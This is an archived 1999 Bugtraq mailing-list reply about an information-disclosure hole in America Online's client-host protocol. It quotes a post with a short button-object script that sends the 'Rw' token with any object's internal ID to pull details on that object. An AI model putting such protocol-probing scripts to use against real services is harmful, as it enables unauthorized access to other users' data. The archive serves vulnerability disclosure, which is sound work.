Home page logo
/

bugtraq logo Bugtraq mailing list archives

Re: America Online Token Hole
From: granny () PINKFLOYD COM (John Schuster)
Date: Mon, 12 Jul 1999 16:05:49 -0000


I had contacted the person who posted this information.  It 
seems that AOL has contacted him and he refuses to talk 
about this if you ask about it.

Does anyone have any information on how to make your own 
programmable buttons for aol?

granny

About a year ago, I found out that by sending the "Rw" token 
to the AOL host while signed on along with the object's 
internal id as arg, any user could get detailed info about 
any object on the system.

man_start_object < trigger, "" >
mat_relative_tag < 22 >
act_replace_select_action
< 
uni_start_stream 
sm_send_token_arg <"Rw", INTERNAL ID HERE>
uni_end_stream 
<FONT COLOR="#222255">> </FONT>
mat_precise_x < 0 > 
mat_precise_y < 226 > 
mat_font_sis < small_fonts, 7, normal> 
mat_art_id < 1-0-21184 >
mat_bool_default < yes > 
man_end_object 

comments questions..   <A 
HREF="mailto:mackk () rpi edu">mackk () rpi edu</A>


  By Date           By Thread  

Current thread:
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]